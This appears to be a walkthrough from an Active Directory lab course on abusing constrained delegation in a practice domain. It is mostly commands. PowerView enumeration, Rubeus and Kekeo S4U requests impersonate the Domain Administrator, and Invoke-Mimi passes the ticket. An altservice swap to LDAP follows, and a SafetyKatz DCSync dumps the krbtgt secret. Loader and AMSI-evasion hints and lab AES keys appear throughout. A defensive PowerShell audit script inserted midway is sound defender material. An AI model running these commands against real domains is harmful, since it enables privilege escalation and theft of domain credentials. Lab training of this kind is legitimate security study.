Task 1
Enumerate users in the domain for whom Constrained Delegation is enabled.
For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
Pass the ticket and access the service.
Use InviShell and PowerView to enumerate users with constrained delegation enabled.
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1
PS C:\Users\student372> Get-DomainUser -TrustedToAuth
websvc has constrained delegation enabled. Since we already have the websvc credentials, we can use them to access CIFS/dcorp-mssql as a domain admin.
Using the websvc key we obtain a TGT for websvc (the first hop) and then request a TGS for the CIFS service on behalf of the Domain Administrator. This TGS is used to access the CIFS service.
Abuse with Rubeus
We use the websvc AES key to request a TGS as the Domain Administrator from the KDC and import it into the current session.
# ArgSplit for "s4u" (the split argument is passed as %Pwn%)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
klist
Now we can access the CIFS service.
C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Abuse with Kekeo
Request a TGT for websvc.
C:\Windows\system32>cd C:\AD\Tools\kekeo\x64
C:\AD\Tools\kekeo\x64>.\kekeo.exe
kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
We can use this TGT to request a TGS for CIFS/dcorp-mssql as the DA.
kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
Since the ticket is stored in a file, we inject it into the current session to use it. Open InviShell, import Invoke-Mimi, and pass the ticket.
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Invoke-Mimi.ps1
Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
We can now access the CIFS service.
C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Task 2
Enumerate computer accounts in the domain for which Constrained Delegation is enabled.
For such an account, request a TGT from the DC.
Obtain an alternate TGS for LDAP service on the target machine.
Use the TGS for executing DCSync attack.
We use InviShell and import PowerView to find computer accounts with constrained delegation enabled.
# InviShell and AMSI bypass, then PowerView:
PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1
# Enumerate Computers with Constrained Delegation enabled
PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth
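The two enumeration steps above (users in Task 1, computers in Task 2) can be combined into a single defender-side audit. The script below is an added example and is not part of the lab notes or of PowerView; it assumes the RSAT ActiveDirectory module and read access to the domain, and the group names are the standard built-in ones. It lists every account with msDS-AllowedToDelegateTo set, whether protocol transition is enabled, and which hosts are reachable (every SPN on the host, since the service name in the ticket is not protected), then reports Domain Admins that are still impersonable because they are neither marked "sensitive and cannot be delegated" nor in Protected Users.

```powershell
# Added audit example (not from the lab notes). Assumes the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# userAccountControl bits relevant to constrained delegation
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition: S4U2Self for any user
$NOT_DELEGATED                  = 0x100000    # "Account is sensitive and cannot be delegated"

function Get-ConstrainedDelegationAudit {
    # Any object (user or computer) with msDS-AllowedToDelegateTo set is a delegation first hop.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
                 -Properties msDS-AllowedToDelegateTo, userAccountControl |
        ForEach-Object {
            $uac  = [int]$_.userAccountControl
            $spns = @($_.'msDS-AllowedToDelegateTo')
            # Report target hosts, not just listed SPNs: the service part of the
            # ticket is not protected, so any SPN on the same host is reachable.
            $hosts = $spns | ForEach-Object { (($_ -split '/')[1] -split ':')[0] } | Sort-Object -Unique
            [pscustomobject]@{
                Account            = $_.Name
                Class              = $_.ObjectClass
                ProtocolTransition = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
                TargetHosts        = ($hosts -join ',')
                AllowedSPNs        = ($spns -join ',')
            }
        }
}

function Get-UnprotectedDomainAdmins {
    # Hardening check: privileged users that can still be impersonated through S4U.
    $protected = @(Get-ADGroupMember 'Protected Users' -Recursive | Select-Object -ExpandProperty distinguishedName)
    Get-ADGroupMember 'Domain Admins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Properties userAccountControl |
        Where-Object {
            -not ([int]$_.userAccountControl -band $NOT_DELEGATED) -and
            ($protected -notcontains $_.DistinguishedName)
        } |
        Select-Object SamAccountName, DistinguishedName
}

Get-ConstrainedDelegationAudit | Format-Table -AutoSize
Get-UnprotectedDomainAdmins    | Format-Table -AutoSize
```

Accounts in the second list should be added to Protected Users or flagged NOT_DELEGATED, and first-hop accounts with ProtocolTransition set deserve the closest review.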
dcorp-adminsrv has constrained delegation enabled. Since we have the AES keys of dcorp-adminsrv$, we use Rubeus to impersonate the Domain Admin.
# ArgSplit for s4u
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
To abuse the LDAP ticket we just imported, we use DCSync to dump the secrets.
# Notice that we can replace the service name because it is not encrypted in the ticket. So instead of TIME we requested LDAP; HTTP would work as well.
# ArgSplit lsadump::dcsync
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"